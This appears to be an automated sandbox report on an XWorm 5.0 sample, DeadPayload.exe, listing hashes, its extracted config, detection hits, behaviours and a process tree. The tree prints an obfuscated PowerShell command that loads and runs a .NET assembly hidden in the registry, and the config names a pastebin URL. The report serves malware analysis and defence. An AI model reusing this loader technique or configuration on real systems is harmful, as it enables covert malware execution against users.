Analysis
-
max time kernel
150s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
31/10/2024, 03:27
Static task
static1
Behavioral task
behavioral1
Sample
DeadPayload.exe
Resource
win7-20240903-en
General
-
Target
DeadPayload.exe
-
Size
500KB
-
MD5
32a460b41d3309d8fd5512dce58357d9
-
SHA1
b83e6686de15c57184ae8b8be80d0b5b323f3712
-
SHA256
0287c741bae11fcfebf9f7d81b1f663379f531855ef381faecdc006ef689c25c
-
SHA512
dc8e37a4aa54519b7578247b9a95b70a446667c15f799ba30dcf14a49858ed2dfa79287476532f62d7e6c44de372dd9035e5d881794c7266dab31c6955fd15e4
-
SSDEEP
12288:f3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sd7:3kGTy
Malware Config
Extracted
xworm
5.0
bbz3FQzIYGOJF400
-
Install_directory
%Public%
-
install_file
ohh.exe
-
pastebin_url
https://pastebin.com/raw/J09JweeH
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000015d0d-6.dat family_xworm behavioral1/memory/1832-8-0x0000000000B00000-0x0000000000B0E000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2072 created 428 2072 powershell.EXE 5 -
Xworm family
-
Executes dropped EXE 2 IoCs
pid Process 1832 DeadMan.exe 2128 DeadRoot.exe -
pid Process 2072 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2072 set thread context of 2692 2072 powershell.EXE 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadRoot.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 008495e4442bdb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2072 powershell.EXE 2072 powershell.EXE 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe 2692 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1832 DeadMan.exe Token: SeDebugPrivilege 2072 powershell.EXE Token: SeDebugPrivilege 2072 powershell.EXE Token: SeDebugPrivilege 2692 dllhost.exe Token: SeAuditPrivilege 840 svchost.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2872 wrote to memory of 1832 2872 DeadPayload.exe 29 PID 2872 wrote to memory of 1832 2872 DeadPayload.exe 29 PID 2872 wrote to memory of 1832 2872 DeadPayload.exe 29 PID 2872 wrote to memory of 2128 2872 DeadPayload.exe 30 PID 2872 wrote to memory of 2128 2872 DeadPayload.exe 30 PID 2872 wrote to memory of 2128 2872 DeadPayload.exe 30 PID 2872 wrote to memory of 2128 2872 DeadPayload.exe 30 PID 1964 wrote to memory of 2072 1964 taskeng.exe 32 PID 1964 wrote to memory of 2072 1964 taskeng.exe 32 PID 1964 wrote to memory of 2072 1964 taskeng.exe 32 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2072 wrote to memory of 2692 2072 powershell.EXE 34 PID 2692 wrote to memory of 428 2692 dllhost.exe 5 PID 2692 wrote to memory of 472 2692 dllhost.exe 6 PID 2692 wrote to memory of 488 2692 dllhost.exe 7 PID 2692 wrote to memory of 496 2692 dllhost.exe 8 PID 2692 wrote to memory of 596 2692 dllhost.exe 9 PID 2692 wrote to memory of 672 2692 dllhost.exe 10 PID 2692 wrote to memory of 756 2692 dllhost.exe 11 PID 2692 wrote to memory of 812 2692 dllhost.exe 12 PID 2692 wrote to memory of 840 2692 dllhost.exe 13 PID 2692 wrote to memory of 964 2692 dllhost.exe 15 PID 2692 wrote to memory of 108 2692 dllhost.exe 16 PID 2692 wrote to memory of 344 2692 dllhost.exe 17 PID 2692 wrote to memory of 1064 2692 dllhost.exe 18 PID 2692 wrote to memory of 1108 2692 dllhost.exe 19 PID 2692 wrote to memory of 1160 2692 dllhost.exe 20 PID 2692 wrote to memory of 1204 2692 dllhost.exe 21 PID 2692 wrote to memory of 1664 2692 dllhost.exe 23 PID 2692 wrote to memory of 1476 2692 dllhost.exe 24 PID 2692 wrote to memory of 2860 2692 dllhost.exe 25 PID 2692 wrote to memory of 1964 2692 dllhost.exe 31 PID 2692 wrote to memory of 2072 2692 dllhost.exe 32 PID 2692 wrote to memory of 2916 2692 dllhost.exe 33
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6c6dc1d8-c8de-46c9-ac92-35d67c8d52eb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1664
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:756
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:812
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1160
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\system32\taskeng.exetaskeng.exe {912D90F6-8C3A-4991-A213-11C5EA122625} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'T'+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+'D'+''+[Char](101)+''+[Char](97)+''+'d'+'s'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:108
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:344
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1064
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1108
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1476
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2860
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe"C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Users\Public\DeadMan.exe"C:\Users\Public\DeadMan.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Users\Public\DeadRoot.exe"C:\Users\Public\DeadRoot.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2128
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1426204879-12045989041528601166-663992467725422111-1871024949-1871114557-774059290"1⤵PID:2916
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5de5bb947d72f5167c12b02f85cb0ef32
SHA1cb5b5b754e196ec3072816cb6e250d7dd703752b
SHA25666f4ceed7b605df523601dc9a35ccf271be390f4c1d12772c6a047ea970081cd
SHA51226763a5ffc87a77b7e25687d900d32baf67c9e45e51a970c683dc1499c37c52b83b5757c3929cf117af8c5fd494491e063fdf88be9609867bd98379d06e83c33
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4